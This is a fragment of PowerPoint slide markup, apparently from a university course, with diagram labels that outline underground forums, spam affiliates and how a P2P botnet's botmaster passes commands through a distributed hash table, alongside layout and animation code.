              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Underground Forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Spam and “Affiliates”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1204391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5034886" y="2031186"/>
            <a:ext cx="4511885" cy="4511885"/>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38200" y="365126"/>
            <a:ext cx="10515600" cy="735616"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P2P Botnets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589449" y="4267201"/>
            <a:ext cx="2059218" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618594" y="1648623"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495946" y="2507265"/>
            <a:ext cx="0" cy="110679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050" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495946" y="2507264"/>
            <a:ext cx="702882" cy="3918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2677253" y="3810026"/>
            <a:ext cx="2357633" cy="2128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449816" y="2982712"/>
            <a:ext cx="2037280" cy="779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677253" y="3731567"/>
            <a:ext cx="2504853" cy="13411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449816" y="2248466"/>
            <a:ext cx="2534290" cy="81219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050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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316" y="1528004"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\ser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514" y="3291036"/>
            <a:ext cx="881062" cy="8810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4179" y="1827015"/>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Classes\CS 4700\assets\ser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607" y="2620129"/>
            <a:ext cx="881062" cy="881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824" y="1827015"/>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7164" y="2282502"/>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8753" y="2086559"/>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9689" y="3049774"/>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8446" y="4022864"/>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8039" y="6025383"/>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3506" y="4920343"/>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758" y="5717059"/>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2105" y="267438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752" y="6177783"/>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7077" y="6025383"/>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458" y="558112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448" y="4764419"/>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562" y="3731567"/>
            <a:ext cx="616648" cy="616648"/>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Curved Connector 40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="2"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6927840" y="1622900"/>
            <a:ext cx="259544" cy="1901071"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -197127"/>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3" name="Curved Connector 82"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6844361" y="1937104"/>
            <a:ext cx="1040152" cy="3748017"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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4" name="Curved Connector 83"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="82" idx="3"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343210" y="4039891"/>
            <a:ext cx="3670296" cy="1188776"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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5" name="Curved Connector 84"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="81" idx="3"/>
            <a:endCxn id="74" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5487096" y="5072743"/>
            <a:ext cx="1819980" cy="1105040"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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descr="D:\Classes\CS 4700\assets\Email-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9733" y="2135340"/>
            <a:ext cx="613165" cy="61316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D:\Classes\CS 4700\assets\Email-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7932" y="3670828"/>
            <a:ext cx="613165" cy="61316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D:\Classes\CS 4700\assets\Email-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9817" y="3210063"/>
            <a:ext cx="613165" cy="61316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D:\Classes\CS 4700\assets\Email-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2536" y="3029277"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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2425" y="4106342"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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4825" y="4644281"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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4616" y="2493603"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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5687" y="1773769"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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75301" y="3918255"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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23570" y="5338533"/>
            <a:ext cx="361570" cy="36157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D:\Classes\CS 4700\assets\Email-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34615" y="6518462"/>
            <a:ext cx="361570" cy="361570"/>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Curved Connector 95"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="8164075" y="2287737"/>
            <a:ext cx="455487" cy="767340"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50188"/>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99" name="Curved Connector 98"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="80" idx="0"/>
            <a:endCxn id="15" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7168415" y="3736036"/>
            <a:ext cx="352461" cy="3337724"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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02" name="Curved Connector 101"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="2"/>
            <a:endCxn id="74" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5277729" y="4148437"/>
            <a:ext cx="3734120" cy="324573"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9370249" y="1478738"/>
            <a:ext cx="2410575" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Structured P2P Distributed Hash Table (DHT)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="106" name="Group 105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7199012" y="188103"/>
            <a:ext cx="2936980" cy="990238"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1411903"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Rectangular Callout 106"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181601" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 29439"/>
                <a:gd name="adj2" fmla="val 106783"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="108" name="TextBox 107"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219204" y="4928315"/>
              <a:ext cx="5181601" cy="1360387"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Insert commands into the DHT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BDBD634-2155-4EA0-BC0F-89210F5D92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2212" y="1711917"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CE3806-5788-4221-89DB-EE4C56DD53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6789" y="1727220"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FD67C5-82A0-463F-8FEA-F1FEC4868A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8817" y="1956030"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3A58C1-7BEA-48C0-B1DF-768CD0EF88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1663" y="2658967"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="59" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856CB035-4AF0-4F70-89A2-6BEC1F0CE7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9642" y="3794429"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F1598-5D12-4992-85B1-42492C9C57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2949" y="4775398"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A5E7B6-FFEF-4733-A03C-44E59B76F2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0525" y="2178057"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Picture 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64C298C9-9A35-430E-9CE8-B4FFA12871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8120" y="2965197"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFE9D5F-0360-48C6-A6C8-523880B37D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2423" y="5623759"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Picture 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5AF076-C3AA-4E73-A14F-3FFF5CC81A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2435" y="6245726"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0543F34-0590-4302-8AB9-6537FE3EA2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9965" y="6373878"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DF791-F8C1-4B31-9F0B-432F0CD3EA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4027" y="6371237"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDBA85-98FC-4988-8159-7472D345BF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5421" y="6046784"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Picture 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C77EEDD-91B2-42FD-8940-38DF533CE4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2494" y="4355145"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD37C9F-59B2-4E29-B153-D95878DAC4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7477" y="4885926"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="109" name="Group 108"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1815381" y="5536991"/>
            <a:ext cx="2936980" cy="990238"/>
            <a:chOff x="1219200" y="4876799"/>
            <a:chExt cx="5181605" cy="1411903"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Rectangular Callout 109"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219200" y="4876799"/>
              <a:ext cx="5181601" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -67481"/>
                <a:gd name="adj2" fmla="val -11456"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DA1F28"/>
            </a:solidFill>
            <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="DA1F28">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tw Cen MT"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="111" name="TextBox 110"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1219204" y="4928315"/>
              <a:ext cx="5181601" cy="1360387"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2800" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Get commands from the DHT</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24875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par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8"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par>
                                <p:cTn id="14" presetID="22" presetClass="entr" presetSubtype="8"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3074"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>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88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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fade">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>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90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
